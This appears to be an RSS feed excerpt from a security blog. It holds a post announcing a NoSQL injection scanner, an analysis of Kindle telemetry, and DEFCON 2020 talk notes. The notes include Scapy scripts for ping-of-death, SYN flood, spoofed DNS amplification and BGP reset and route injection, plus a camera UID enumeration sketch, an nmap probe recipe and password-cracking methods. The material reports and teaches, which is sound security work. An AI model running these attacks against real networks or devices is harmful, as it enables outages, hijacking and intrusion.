It is very fast, simple to use, and easy to automate.]]></description><link>https://nullsweep.com/nosqli-a-fast-nosql-injection-framework/</link><guid isPermaLink="false">5f6a931134e13924535586dd</guid><category><![CDATA[Tools]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Thu, 24 Sep 2020 10:11:49 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/09/NoSQLi.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/09/NoSQLi.png" alt="NoSQLi - A Fast NoSQL Injection Scanner"><p>Last year, I started working on a NoSQL injection framework, because I just didn&apos;t find a tool that suited my purposes. Other tools were too hard to automate in my workflow, or missed a lot of the simple test cases I tried.</p><p>So I developed <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">nosqli</a>, an open source NoSQL scanner written in Go. It&apos;s configurable with command line options, and runs a large number of injection attempts against targets. It&apos;s mostly focused on Mongo injections, but does work to a lesser extent against any database that uses JavaScript.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ nosqli
NoSQLInjector is a CLI tool for testing Datastores that 
do not depend on SQL as a query language. 

nosqli aims to be a simple automation tool for identifying and exploiting 
NoSQL Injection vectors.

Usage:
  nosqli [command]

Available Commands:
  help        Help about any command
  scan        Scan endpoint for NoSQL Injection vectors
  version     Prints the current version

Flags:
      --config string       config file (default is $HOME/.nosqli.yaml)
  -d, --data string         Specify default post data (should not include any injection strings)
  -h, --help                help for nosqli
  -p, --proxy string        Proxy requests through this proxy URL. Defaults to HTTP_PROXY environment variable.
  -r, --request string      Load in a request from a file, such as a request generated in Burp or ZAP.
  -t, --target string       target url eg. http://site.com/page?arg=1
  -u, --user-agent string   Specify a user agent

Use &quot;nosqli [command] --help&quot; for more information about a command.

$ nosqli scan -t http://localhost:4000/user/lookup?username=test
Running Error based scan...
Running Boolean based scan...
Found Error based NoSQL Injection:
  URL: http://localhost:4000/user/lookup?=&amp;username=test
  param: username
  Injection: username=&apos;
</code></pre>
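<p>The &quot;Boolean based scan&quot; in the output above works by sending paired payloads that should evaluate true and false on the server, then comparing responses. A minimal sketch of that detection idea (the function name and response strings are hypothetical illustrations, not part of nosqli):</p>

```python
# Boolean-based blind injection detection, sketched: compare a baseline
# response against responses to payloads that should evaluate true and
# false in the database. If the "true" payload matches the baseline while
# the "false" payload differs, the parameter is likely injectable.
def looks_boolean_injectable(baseline_body: str, true_body: str, false_body: str) -> bool:
    return true_body == baseline_body and false_body != baseline_body

# Example payloads for a Mongo-backed app evaluating JavaScript:
#   baseline:  username=test
#   true:      username=test' && 'a'=='a
#   false:     username=test' && 'a'=='b
print(looks_boolean_injectable("user found", "user found", "no results"))  # → True
```

In practice the comparison is fuzzier than strict equality (timestamps and nonces vary between responses), which is part of what a scanner automates for you.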
<!--kg-card-end: markdown--><h2 id="using-nosqli">Using NoSQLi</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/09/nosqli_demo_nosql_injection_scan.gif" class="kg-image" alt="NoSQLi - A Fast NoSQL Injection Scanner" loading="lazy" width="2048" height="934"><figcaption>nosql scanning using nosqli</figcaption></figure><p>I tried to keep a simple and flexible CLI interface for scanning. You can pass in a target URL with GET parameters that need to be scanned, or a saved request with POST data. The scanner is smart enough to know if the data is JSON or form data, and will inject either way.</p><p>The configurations currently support running through a proxy (so you can view the generated traffic in Burp or similar software) and changing the user agent.</p><h2 id="scanning-types">Scanning Types</h2><p>NoSQLi has the most commonly found injection vectors implemented:</p><p><strong>Error Scans: </strong>Look for known error strings in responses from the server.</p><p><strong>Blind Boolean Injections</strong>: When the page doesn&apos;t return errors, but does return different data when <code>true</code> or <code>false</code> is returned from the database (or when some records are retrieved vs. no records)</p><p><strong>Timing based injections</strong>: When all else fails, if the database sends a delayed response after a successful injection.</p><h2 id="using-nosqli-with-requests">Using NoSQLi with Requests</h2><p>A key feature missing from a few scanners I tried previously was the ability to export a request from a proxy and run the injections based on that. 
NoSQLi can leverage this easily, keeping all the header information, including things like the user agent.</p><p>While the tool does not yet support importing a full session log and executing tests against all requests sequentially, saving a standard HTTP request to a file and referencing that file allows repeatable tests and works with requests exported from other tools such as Burp.</p><h2 id="installing-nosqli">Installing NoSQLi</h2><p>The <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">GitHub page</a> has all the instructions. You can build from source or download and run the appropriate <a href="https://github.com/Charlie-belmer/nosqli/releases?ref=nullsweep.com">executable</a> for your system.</p><h2 id="roadmap-future-features">Roadmap / Future features</h2><p>I&apos;d like to support data extraction and specific tests for NoSQL databases beyond MongoDB. If you have ideas, try it out and let me know what else you would like to see!</p>]]></content:encoded></item><item><title><![CDATA[Kindle Collects a Surprisingly Large Amount of Data]]></title><description><![CDATA[Reading a book on a Kindle sends Amazon a lot of data about reading habits. 
How fast pages are turned, font sizes and views, and device details.]]></description><link>https://nullsweep.com/kindle-collects-a-surprisingly-large-amount-of-data/</link><guid isPermaLink="false">5f3c070f34e139245355854d</guid><category><![CDATA[Privacy]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 25 Aug 2020 13:13:07 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1456953180671-730de08edaa7?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1456953180671-730de08edaa7?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Kindle Collects a Surprisingly Large Amount of Data"><p>As an avid reader, I&apos;ve owned several generations of Kindle devices, from the original to the Paperwhite, and loved each of them.</p><p>However, I have also kept a watchful eye on the abuse potential of the new format. Because Amazon technically owns the content you view, they may revoke it at any time. There have been cases of Amazon <a href="https://io9.gizmodo.com/amazon-secretly-removes-1984-from-the-kindle-5317703?ref=nullsweep.com">removing specific books</a> from customer accounts (and kindles). Considerably worse, there are also cases of Amazon revoking user accounts and <a href="https://www.bekkelund.net/2012/10/22/outlawed-by-amazon-drm/?ref=nullsweep.com">removing all access to purchased books</a>.</p><p>Kindle services leverage reading data to offer some nice features that traditional books can&apos;t offer: maintaining bookmarks and notes between devices, keeping all devices synced with the last read page, and more. It also shows ads and recommendations for next books to read on the kindle. 
</p><p>I was curious to know if the Kindle was only sending the data required for these services, or if other data about me was being sent.</p><h2 id="turns-out-kindle-collects-a-ton-of-data">Turns out, Kindle Collects a Ton of Data</h2><p>The Kindle sends device information, usage metadata, and details about every interaction with the device (or app) while it&apos;s being used. All of this is linked directly to the reader account.</p><p>Opening the app, reading a book, flipping through a few pages, then closing the book sends over 100 requests to Amazon servers. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/08/kindle_data_flows.png" class="kg-image" alt="Kindle Collects a Surprisingly Large Amount of Data" loading="lazy"><figcaption>Kindle data requests</figcaption></figure><h3 id="the-invasive-behavioral-information">The Invasive Behavioral Information</h3><p>Essentially, the Kindle tracks every tap and interaction someone makes while reading.</p><p>Every page that is read sends the following information:</p><ul><li>Time a page was opened (when you turn to a new page, a timestamp is generated)</li><li>The first character on the page (this might be something like character 7705 in the book, which is the exact location)</li><li>The last character on the page</li><li>Whether the page contains images or text</li></ul><p>Here&apos;s a sample record that is sent with every page read:</p><!--kg-card-begin: markdown--><pre><code class="language-json">{
    &quot;created_timestamp&quot;: 1597743233808,
    &quot;payload&quot;: {
        &quot;context&quot;: &quot;Reading&quot;,
        &quot;continuous_scroll_state&quot;: &quot;disabled&quot;,
        &quot;end_position&quot;: 4708,
        &quot;is_scrolled_over_span&quot;: false,
        &quot;span_type&quot;: &quot;Text&quot;,
        &quot;start_position&quot;: 4193
    },
    &quot;schema_name&quot;: &quot;kindle_positions_consumed_v2&quot;,
    &quot;schema_version&quot;: 0,
    &quot;sent_timestamp&quot;: 1597743233855,
    &quot;sequence_number&quot;: 26
}
</code></pre>
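<p>Records like this make fine-grained inference trivial. A small sketch of how per-page events translate into reading-speed data (the second record below is hypothetical, invented for illustration):</p>

```python
# Each page event carries a timestamp plus the first and last character
# position on the page. Consecutive events therefore yield both the number
# of characters read and the seconds spent on each page.
page_events = [
    {"created_timestamp": 1597743233808, "start_position": 4193, "end_position": 4708},
    # hypothetical next page-turn event, ~21.5 seconds later
    {"created_timestamp": 1597743255324, "start_position": 4708, "end_position": 5190},
]

for prev, cur in zip(page_events, page_events[1:]):
    chars = prev["end_position"] - prev["start_position"]
    seconds = (cur["created_timestamp"] - prev["created_timestamp"]) / 1000
    print(f"{chars} characters read in {seconds:.1f} seconds")
```

Aggregated over a whole book, this is enough to profile reading speed, attention span, and which passages a reader lingers on or skips.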
<!--kg-card-end: markdown--><p>Every reading session will also generate a summary of how many pages were read in different modes:</p><!--kg-card-begin: markdown--><pre><code class="language-json">{
    &quot;created_timestamp&quot;: 1597743255324,
    &quot;payload&quot;: {
        &quot;action_type&quot;: &quot;PageTurn&quot;,
        &quot;book_length&quot;: 2003478,
        &quot;context&quot;: &quot;Reading&quot;,
        &quot;count&quot;: 10,
        &quot;navigation_end_location&quot;: 7884,
        &quot;navigation_mode&quot;: &quot;Horizontal&quot;,
        &quot;navigation_start_location&quot;: 3599
    },
    &quot;schema_name&quot;: &quot;reader_in_book_navigation_v2&quot;,
    &quot;schema_version&quot;: 0,
    &quot;sent_timestamp&quot;: 1597743265854,
    &quot;sequence_number&quot;: 36
}
</code></pre>
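<p>Even this summary record says a lot on its own. A quick sketch of what can be derived from just the fields shown above:</p>

```python
# A single navigation summary yields page-turn count, average page size,
# and how far into the book the session reached.
record = {
    "book_length": 2003478,
    "count": 10,  # page turns in the session
    "navigation_start_location": 3599,
    "navigation_end_location": 7884,
}

span = record["navigation_end_location"] - record["navigation_start_location"]
pct_of_book = 100 * span / record["book_length"]
chars_per_turn = span / record["count"]
print(f"Covered {span} characters (~{pct_of_book:.2f}% of the book), "
      f"averaging {chars_per_turn:.0f} characters per page turn")
```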
<!--kg-card-end: markdown--><p>Similar data sets are sent for opening the app, whether it is in the background when opened, when a book is opened or closed, and when settings like font size are changed. Highlighting or tapping any word will send the requests with the text to Bing Translate and Wikipedia, as well as back to Amazon.</p><p>None of these requests appear to be used for customer features like last read location. Instead, the highlights, last read location, and other information are sent a second time, to a different endpoint, on a periodic basis, with much less granular information.</p><p>Requests also aren&apos;t sent as soon as they&apos;re generated. A number of these records are created and stored locally, then uploaded (note the sequence_number field). Even if a person is offline while reading, this data is stored and sent when reconnected.</p><h3 id="device-information">Device Information</h3><p>The Kindle also includes a few more bits of personal information I would rather it didn&apos;t:</p><ul><li>Country of residence</li><li>An attempt to get the IP address on the local network (a 10. address, which was incorrect for me)</li><li>Device information and version (screen size, make and model (iPhone vs. Android vs. Kindle), and software version)</li><li>Goodreads account details</li><li>Device orientation (portrait vs. landscape)</li></ul><p>Some of this is likely to help Amazon understand how users use the app, so they can improve it for those use cases. The local IP is the only item on here that bothers me, though I couldn&apos;t find any other local network information that would be problematic.</p><h2 id="conclusions">Conclusions</h2><p>The Kindle is far from the most privacy-invasive app I have seen, but it records a lot of behavioral reading information I don&apos;t like. 
I&apos;ve been trying to get away from the Kindle ecosystem for the past year or so, and now use <a href="https://apps.apple.com/us/app/marvin-3/id1086482858?ref=nullsweep.com">Marvin</a> for reading on my iPhone. I no longer use the Kindle device, though I dearly miss e-Ink.</p><p>Unfortunately, in order to use a non-Kindle application, I have to buy DRM-free books. It isn&apos;t always easy to find them, though the Kobo bookstore and small niche providers often offer them, and some can even be found on Amazon.</p>]]></content:encoded></item><item><title><![CDATA[DEFCON 2020 Live Notes]]></title><description><![CDATA[Notes from various DEFCON talks, conversations, and Q&A sessions.]]></description><link>https://nullsweep.com/defcon-2020-live-notes/</link><guid isPermaLink="false">5f2bd7b3fec4c20515762288</guid><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Thu, 06 Aug 2020 11:15:07 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1510915228340-29c85a43dcfe?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1510915228340-29c85a43dcfe?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="DEFCON 2020 Live Notes"><p>I&apos;m taking some time to attend <a href="https://defcon.org/?ref=nullsweep.com">DEFCON</a> virtually this year. 
I&apos;ll be posting notes from talks, Q&amp;A, and maybe even takeaways from &quot;hallway&quot; conversations I have here throughout the weekend.</p><p>I tend to focus mostly on webappsec, cloud security, and new exploits, but there are some interesting talks outside of my area of expertise I hope to find time for as well.</p><h2 id="sunday-august-9th">Sunday August 9th</h2><h3 id="bytes-in-disguise-_-">Bytes in Disguise (&#x2310;&#x25A0;_&#x25A0;)</h3><p><a href="https://www.youtube.com/watch?v=KDo3CExd8Ns&amp;ref=nullsweep.com">Video</a></p><p>This talk by Mickey Shkatov and Jesse Michael covers various places to hide bytes so endpoint protection is unlikely to find them - some very interesting places! <a href="https://github.com/HackingThings/BytesInDisguise?ref=nullsweep.com">Github for their demos</a></p><ul><li>Covering previous talk about keeping malware / payloads off disk (to avoid AV), in memory, and in particular in UEFI. This made EDR and AV blind to the UEFI variables.</li><li>Where can we hide payload data so the time to detect is longer? UEFI Set/GetFirmwareEnvironmentVariable*, UEFI RT services.</li><li>To enumerate attack surface: take apart the device and take hi-res photos (decent cell camera works) of the various hardware chips (can also try Googling teardown images of the model). Look for official schematics if possible (though finding schematics for modern hardware is rare). Find official docs that describe volatile and non-volatile memory components - Google hack: <code>&quot;flash&quot; + &quot;of volatility&quot; filetype:pdf</code>. You may find things like &quot;128 bytes are protected by Intel. The other 128 bytes are not write-protected&quot;. 
But don&apos;t take the documents at their word (especially when they declare something as not user modifiable - usually that just means it is not intended for user modification, not that it is actually write protected).</li><li>Some places to hide bytes: CMOS, SPI, SPD, USB controllers, PCI bridges &amp; endpoint devices, Displays/monitors, track/touch-pads</li><li>CMOS: tiny non-volatile RAM backed by coin cell battery, located inside the chipset. Has a few unused bytes that are accessible via IO ports, but only 256 bytes and risk of bricking the system or disrupting PCR measurements (only mess with 0 value bytes). <a href="https://youtu.be/KDo3CExd8Ns?t=1367&amp;ref=nullsweep.com">Demo bookmark</a></li><li>SPI Flash: includes BIOS/UEFI, ME firmware, config data, platform specific regions and more. Often protected in modern systems, but sometimes permissions are not correct, or the permissions themselves are writable.</li><li>SPD: Serial presence detect chip - the chip in a replaceable memory chip that notifies the system how to use it. It includes info about the memory module, and usually has unused space that is sometimes writable (read at boot, so overwriting values may brick the system until module is removed). May not exist on systems with soldered memory. Usually only 256-512 bytes available.</li><li>USB controllers, often on the motherboard with updatable firmware (a large number have unsigned updates). <a href="https://youtu.be/KDo3CExd8Ns?t=2053&amp;ref=nullsweep.com">Demo bookmark</a>. You can likely find similar spaces on most attached devices that have firmware (most of them). LAN ports are usually a good spot to look as well.</li><li>How do we access SPI flash? The &apos;flash programming tool&apos; (may require some digging to find), firmware update tools from vendors. <a href="https://youtu.be/KDo3CExd8Ns?t=2773&amp;ref=nullsweep.com">Demo bookmark</a>. 
Even signed firmware images often only validate the block of data used - empty space not included.</li><li>Nearly all of this requires admin / Ring 0</li><li>Recommended <a href="https://github.com/smx-smx/ASMTool?ref=nullsweep.com">ASMio</a> tool by Stefano Moioli (leveraged in some of the demos)</li></ul><h4 id="lateral-movement-and-privilege-escalation-in-gcp">Lateral Movement and Privilege Escalation in GCP</h4><p><a href="https://www.youtube.com/watch?v=Z-JFVJZ-HDA&amp;ref=nullsweep.com">Video</a></p><p>This talk by Allison Donovan and Dylan Ayrey covers GCP attack techniques. I am interested in cloud security, but don&apos;t have any real experience with GCP.</p><ul><li>AWS has policies for users, GCP has policies for resources. Owner of a service account can&apos;t read the resource policies or even know if they have access. As a result, it isn&apos;t possible to know what a given user has access to - instead you have to look at a resource and see who has access to it. Service accounts can be granted access to resources from outside the organization (meaning it&apos;s really not possible to know what a given user has access to).</li><li>An interesting scenario covered with GKE (Kubernetes) - admin creates a cluster with a service account, service account manages nodes. Devs are given access to specific nodes. If a developer grants the Kubernetes service account access to some resource the dev owns (so their node can access it), this grants all nodes access to that resource, meaning any developer can access it, including ones added in the future - but the Kubernetes admin who owns the service account cannot know what resources have been granted! Sounds like a problem...</li><li>Most resources are grouped into orgs which have inheritance. 
So, realistically, in the above scenario, you would end up with entire project level role bindings.</li><li>This all means that granting anyone access to a service account is inherently risky - it is hard to really know what permissions that role has, unless you introspect all your own resources.</li><li>They mapped out orgs from IAM entries committed to GitHub to generate an org graph.</li><li>Primitive editor role is pretty powerful - has a lot of default permissions - to associate service accounts to resources, and this role is created by default on resource creation. </li><li>Resources default to thousands of permissions.</li><li>So how do we use this to move laterally in an organization? If a developer grants an act-as permission to something like the editor role. </li><li><a href="https://youtu.be/Z-JFVJZ-HDA?t=1309&amp;ref=nullsweep.com">Demo</a>: From a base identity via phishing, they use project listing, service accounts, and actas permissions to take control of service accounts. </li><li>Major finding: if you have one service account with editor access on a project, and another service account with owner on that project, the editor level service account can <em>always</em> privilege escalate itself to owner. This is also true for developers with editor level!</li><li>If one of the lateral moves hits an org role binding, can be used to get org access due to inheritance.</li><li>Released tool <a href="https://github.com/dxa4481/gcploit?ref=nullsweep.com">Gcploit</a> to automate this flow.</li><li>Remediation: defensive script to map out the same flow that an attacker could exploit. 
Also, GCP IAM analyzer to analyze this (result of these findings)</li><li>Also released some monitoring tools to identify someone using this tool in an environment.</li></ul><h3 id="take-down-the-internet-with-scapy">Take down the internet with Scapy</h3><p>This was a live session by John Hammond</p><p>I have used Scapy for many interesting things, but nothing too serious, so I was interested to see what else it could do. This talk is mostly about using Scapy to craft DoS attacks, old and new.</p><ul><li>What kind of disruptive attacks could be done? Goal of this talk is to describe attacks that just recklessly break things, and show how easy it is.</li><li>Scapy is a packet crafting library for Python - formulate TCP or UDP packets, CANbus, Bluetooth, and others.</li><li>Some basic syntax to ping and print the response. It builds an ICMP packet and sends it to <code>dst</code>.</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">from scapy.all import *
ping = IP(dst=&quot;192.168.1.1&quot;)/ICMP()
resp = sr1(ping, timeout=2)  # send the packet and wait for a single reply
print(resp)
</code></pre>
<!--kg-card-end: markdown--><ul><li>Ping of death attack: DoS by sending ping packets that are larger than the maximum allowable size. Scapy script: <code>send(fragment(IP(dst=&quot;192.168.10.5&quot;)/ICMP()/(&quot;X&quot;*60000)))</code> Some systems are still vulnerable to this, though it&apos;s a pretty old and outdated attack.</li><li>SYN flood: try to consume all open TCP connections on a server by sending SYNs but never completing the handshake, so each half-open connection is held by the server for a short time.</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">syn_flood = (IP(dst=&quot;192.168.1.1&quot;, id=1111, ttl=99)/
             TCP(sport=RandShort(), dport=[80], seq=12345, ack=1000, window=1000, flags=&quot;S&quot;))  # &quot;S&quot; flag indicates SYN
answered, unanswered = srloop(syn_flood, inter=0.3, retry=2, timeout=4)
</code></pre>
<!--kg-card-end: markdown--><ul><li>DNS amplification attack: DoS based on DNS resolver reflection. Basically, requesting a DNS entry with the source IP spoofed to the victim&apos;s, so that the victim receives many large DNS responses (here <code>src</code> is the victim IP). I am not sure how well this works with modern networks because IP spoofing is largely blocked by networks at every hop, unless the victim is on the same network or geographically close.</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">dns_amp = (IP(src=&quot;192.168.10.5&quot;, dst=&quot;dns.nameserver.com&quot;)/UDP(dport=53)/
           DNS(rd=1, qd=DNSQR(qname=&quot;google.com&quot;, qtype=&quot;ALL&quot;)))  # &quot;ALL&quot; (the ANY query) maximizes response size

send(dns_amp)
</code></pre>
<!--kg-card-end: markdown--><ul><li>BGP Abuse - BGP Hijacking, DoS, blind attacks to disrupt sessions or inject routing misconfigurations.</li><li>Blind disruption - RST flag spoofed, victim would believe the BGP session was terminated. (to achieve this, the attacker has to be between the two routers)</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">dport = 53154 # must match active session
seq_num = 123 # must also match traffic
ack_num = 456 # must also match traffic

bgp_reset = (IP(src=&quot;200.1.1.1&quot;, dst=&quot;200.1.1.3&quot;, ttl=1)/
             TCP(dport=dport, sport=179, flags=&quot;RA&quot;, seq=seq_num, ack=ack_num))
            
send(bgp_reset)
</code></pre>
<!--kg-card-end: markdown--><ul><li>Blind injection of BGP - send malicious routing information to try and hijack the route</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">load_contrib(&quot;bgp&quot;)

dport = 53154
seq_num = 123
ack_num = 456

path_origin = BGPPathAttribute(flags=0x40, type=1, attr_len=1, value=b&quot;\x00&quot;)
path_AS = BGPPathAttribute(flags=0x40, type=2, attr_len=4, value=b&quot;\x02\x01\x01\x2c&quot;)
path_next = BGPPathAttribute(flags=0x40, type=3, attr_len=4, value=b&quot;\x64\x02\x03\x02&quot;)
path_exit = BGPPathAttribute(flags=0x80, type=4, attr_len=4, value=b&quot;\x00\x00\x00\x00&quot;)
# BGPUpdate carries the path attributes and the announced NLRI prefix
path_update = BGPUpdate(total_path=[path_origin, path_AS, path_next, path_exit], nlri=[(24, &quot;5.5.5.0&quot;)])

send(IP(src=&quot;200.1.1.1&quot;, dst=&quot;200.1.1.2&quot;, ttl=1)/
        TCP(dport=dport, sport=179, flags=&quot;PA&quot;, seq=seq_num, ack=ack_num)/
        BGPHeader(Len=52, type=2)/path_update)
</code></pre>
<!--kg-card-end: markdown--><ul><li>Real life cases: June 2019, Verizon had a BGP routing miss that knocked about 15% of traffic off the internet. Cloudflare had a BGP route leak last month. Neither of these were attacks, just network misconfigurations.</li></ul><h3 id="modern-password-hash-cracking">Modern password &amp; hash cracking</h3><p>This is a live talk</p><ul><li>Gaming setups are best - GPU important. Cloud cracking can work well, about $.03 / Giga-hash hour. Built custom rig for $25k which gets 250 GH/hr (2017) - 6 x 1080&apos;s</li><li>8 char passwords can be cracked near instantly with one of these - should not be used in 2020. 12 char is now the minimum - 3 year crack time on NTLM hash (when not in word list)</li><li>Some terms: <strong>masks</strong> - the makeup of a word broken up into its character set. Like Password1 -&gt; &lt;P&gt;&lt;assword&gt;&lt;1&gt; - 3 masks, which can be used to guess the makeup of characters. Most people start their password with a capital letter, then lowercase, ending with numbers. <strong>Hybrid attack</strong> - brute force or mask appended/prepended to a wordlist. <strong>Wordlist</strong> - candidate words which can be modified with rules - usually dictionary words. <strong>Password Dump</strong> - file containing passwords found by previous cracking attempts - more complex words than a wordlist.</li><li>Full kit: hashcat, hashtopolis, HashID, PW_spy</li><li><a href="https://hashcat.net/hashcat/?ref=nullsweep.com">Hashcat</a>: de facto standard, replaced JohnTheRipper. Supports almost every hash imaginable and is very fast. </li><li><a href="https://github.com/s3inlc/hashtopolis?ref=nullsweep.com">Hashtopolis</a>: wrapper for hashcat that manages agents, jobs, wordlists and binaries from a central location. Give it something to crack and it farms it out to various hashcat instances. Can help manage all the hashcat installs as well. 
This is really for the big enterprise engagements (cost of running multiple cloud jobs can be high)</li><li><a href="https://pypi.org/project/hashID/?ref=nullsweep.com">HashID</a> - find the likely hashing algorithm if you are having trouble finding the type of hash, but not so helpful anymore. Another method is to self-register with a password, grab the hash that was created, and then try different methods.</li><li><a href="https://github.com/lwangenheim/pw_spy?ref=nullsweep.com">PW_spy</a> - once some passwords have been cracked, it will find the most common masks, weak passwords, common lengths, and base words used in the cracked set.</li><li>Where to find passwords? hashdump for local accounts, /etc/shadow, mimikatz, web apps, responder, DCSync/NTDS, network snooping...</li><li>Some common password themes: local sports team (pro/college), local street names, &lt;company_name&gt;&lt;year_founded&gt;, sometimes client or project names</li><li>Cracking progression (fastest first): Start with strong wordlist -&gt; add rules -&gt; loopback attacks -&gt; 1-8 char pw brute force (24 hours for NTLM) -&gt; masks.</li></ul><h2 id="saturday-august-8th">Saturday August 8th</h2><h3 id="whispers-among-the-stars-satellite-eavesdropping-">Whispers Among the Stars (Satellite Eavesdropping)</h3><p><a href="https://www.youtube.com/watch?v=ku0Q_Wey4K0&amp;ref=nullsweep.com">Video</a></p><p>This is a great talk by James Pavur on intercepting satellite data. The scope and scale of the findings are significant.</p><ul><li>Attack looked at 18 Geo satellites, covering 100m KM (huge area!)</li><li>Able to intercept a lot of sensitive data - sometimes using vulnerabilities known since 2005. Traffic captured from military jets, industrial work, personal internet traffic, and more.</li><li>Main problem with satellite communications: the initial request is generally a very focused band (limited geo), but the response is broadcast over a very spread out geographic area, so many locations can be used to listen. 
</li><li>Sat equipment is expensive - but a TV sat dish works (~$300) with a sat card (pro card about $300 also), so not too expensive for everyday attackers.</li><li><a href="http://ebspro.net/?ref=nullsweep.com">EBS Pro</a> tool used to scan for internet service - check the Ku band, look for a signal out of the noise (looked like big spikes in the demo) and tell the card to connect at that frequency looking for digital. The driver can then be used to listen in on the wire, and the saved traffic file can be grepped to find info. In the demo - a SOAP API was being sent.</li><li>Legacy protocol used is MPEG-TS (the video streaming format), though this is still used fairly frequently. There are some good tools for working with it: dvbsnoop, tsduck, TSReader.</li><li>Modern protocol: GSE. Popular with enterprise customers, with high-end hardware that made it hard for the low-end tools used here to capture all the data.</li><li>Built <a href="https://github.com/ssloxford?ref=nullsweep.com">GSExtract</a> tool (not released at the time of these notes) to try to reconstruct IP packets from the feed - gives 60-70% of packets.</li><li>Combined, this gives ISP-level visibility into traffic. With enterprise customers, it is often treated as trusted LAN communication, including finding some things like LDAP traffic - some companies, including utility companies, considered the satellite a trusted network.</li><li>Encryption would protect the content of the traffic, but some things that were intercepted: most DNS queries, HTTP headers, emails (intercepted attorney/client communication emails using POP3). This can allow things like password reset attacks by intercepting emails. 
Basic auth strings, FTP with login details, SMB, cruise ship point-of-sale data, passport/visa data from ports, along with timestamps.</li><li>Aviation findings: GSM cell connections sent in clear text over satellite, leading to some text message intercepts and some air control data.</li><li>Satellite communications could be used for undetectable data exfiltration - send data via satellite - even to something like a closed port or broken service on a ship somewhere, and the attacker can listen in.</li><li>TCP session hijacking - depending on the location of the attacker and the user, the attacker may be able to have certainty that their packets will arrive first.</li><li>It is likely that nation-states employ satellite technology that can expand significantly upon these attacks.</li></ul><h3 id="using-p2p-to-hack-3-million-cameras">Using P2P to hack 3 million cameras</h3><p><a href="https://www.youtube.com/watch?v=Z_gKEF76oMM&amp;ref=nullsweep.com">Video</a></p><p>A really great talk by Paul Marrapese on how P2P features in cameras expose them to attack, including cameras behind firewalls. This one is scary - attacks are generally simple, persistent, and unlikely to go away any time soon.</p><ul><li>Hundreds of brands impacted by his findings - a $40 device can be used to accomplish this.</li><li>Paul purchased a highly rated IP camera from Amazon and plugged it in, noticing that it could be viewed from his phone before setting up his firewall rules. Initial analysis: Wireshark shows communications to 3 different servers across the globe, and the video feed sometimes going to other states. </li><li>How was it bypassing his network? Using peer-to-peer. Most cameras use third-party P2P libraries.</li><li>By design, P2P is meant to be exposed to the internet, and can&apos;t be turned off on most devices. It does this by sending UDP packets through the NAT to the P2P server. The firewall will allow returning traffic by design. 
Other clients can use the same technique to open their own firewall. When the server returns the device IP/port, the same technique can be used to create direct communication (UDP hole punching).</li><li>Manufacturers leverage some devices as relays (common in P2P as super nodes), which can&apos;t be opted out of.</li><li>For more fun, you can get direct access to any device if you have the UID (which is guessable); devices generally run ARM-based BusyBox with every service as root.</li><li>P2P servers are the gateway to the clients to orchestrate connections. Manufacturers keep dedicated servers for their own devices - usually listening on UDP port 32100.</li><li>Most users connect via a device unique ID (UID), which is all that&apos;s needed to connect. Written to NVRAM during manufacturing, so unchangeable. UID has three parts - prefix-serial-checkCode</li><li>Wireshark <a href="https://github.com/pmarrapese/iot?ref=nullsweep.com">P2P dissector</a> released to help look at the traffic (protocol details in talk)</li><li>Find P2P servers by scanning cloud providers with Nmap UDP probes. Add <code>udp 32100 &quot;\xf1\x00\x00\x00&quot;</code> to <code>/usr/share/nmap/payloads</code>, then <code>nmap -n -sn -PU32100 --open -iL ranges.txt</code> will run the scan.</li><li>Prefixes can be brute-forced - P2P servers will respond with errors for invalid prefixes. He found about 488 distinct prefixes. Serial numbers are just sequential numbers. The check code is a modified MD5 (found via the iLnkP2P library).</li><li>Most devices use the default password, so the UID is enough to access them. </li><li>Found a buffer overflow without any overflow protections enabled, which allows RCE to a root shell.</li><li>Interestingly, using that shell to get the MAC address and then giving the MAC to Google geolocation gives very accurate lat/long results.</li><li>MitM also possible - with the UID, forge a login message to the P2P service to have traffic routed to you instead of the real device. 
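Given the prefix-serial-checkCode structure above, candidate UIDs can be generated with a tiny sketch like this (the prefix, serial range, and especially the check-code function are hypothetical stand-ins - the real check code is a modified MD5 inside the iLnkP2P library, not reproduced here):

```python
import hashlib

# Hypothetical stand-in for the real (modified-MD5) check code.
def check_code(prefix, serial):
    return hashlib.md5(f"{prefix}-{serial}".encode()).hexdigest()[:6].upper()

# Enumerate candidate UIDs for one known prefix; serials are sequential.
def candidate_uids(prefix, start, count):
    return [f"{prefix}-{serial:06d}-{check_code(prefix, serial)}"
            for serial in range(start, start + count)]

for uid in candidate_uids("PTPP", 100000, 3):  # "PTPP" is a made-up prefix
    print(uid)
```

Sequential serials are what make this enumerable: once one valid UID is seen, its neighbors are trivial to guess.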
